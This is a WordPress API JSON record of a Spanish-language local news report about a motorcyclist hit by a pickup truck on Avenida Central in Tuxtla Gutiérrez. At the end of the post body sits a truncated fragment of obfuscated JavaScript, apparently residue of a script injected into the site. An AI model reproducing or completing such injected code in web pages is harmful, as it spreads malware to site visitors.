{"id":16003,"date":"2024-06-08T06:14:14","date_gmt":"2024-06-08T06:14:14","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16003"},"modified":"2024-06-08T06:14:16","modified_gmt":"2024-06-08T06:14:16","slug":"motociclista-fue-atropellado-en-la-avenida-central","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16003","title":{"rendered":"Motociclista fue atropellado en la Avenida Central"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"16005\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240607-WA0028-1024x576.jpg\" alt=\"\" class=\"wp-image-16005\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240607-WA0028-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240607-WA0028-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240607-WA0028-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240607-WA0028-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240607-WA0028.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"461\" height=\"1024\" data-id=\"16004\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240607-WA0027-461x1024.jpg\" alt=\"\" class=\"wp-image-16004\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240607-WA0027-461x1024.jpg 461w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240607-WA0027-135x300.jpg 135w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240607-WA0027.jpg 576w\" sizes=\"auto, (max-width: 461px) 100vw, 461px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 7de junio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un motociclista result\u00f3 con diferentes heridas tras haber sido atropellado este jueves por la noche cuando circulaba en la Avenida Central y 15 Oriente, de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, el conductor de la Bajab tipo B\u00f3xer de color negro circulaba en \u00e9ste punto cuando una camioneta Nissan Frontier circulaba de Oriente a Poniente y de manera repentina gir\u00f3 a la izquierda.<\/p>\n\n\n\n<p>Esto provoc\u00f3 un corte de circulaci\u00f3n y por el impacto el motociclista sali\u00f3 volando y se impact\u00f3 contra el pavimento.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de la Cruz Roja para atender al lesionado y trasladarlo a un hospital particular para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>Elementos de tr\u00e1nsito ordenaron el levantamiento de las unidades para trasladalas a un corral\u00f3n en turno y deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 7de junio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un motociclista result\u00f3 con diferentes heridas tras haber sido atropellado este jueves por la noche cuando circulaba en la Avenida Central y 15 Oriente, de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, el conductor de la Bajab tipo B\u00f3xer de color negro circulaba en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16004,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-16003","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16003","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16003"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16003\/revisions"}],"predecessor-version":[{"id":16006,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16003\/revisions\/16006"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16004"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16003"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16003"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16003"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}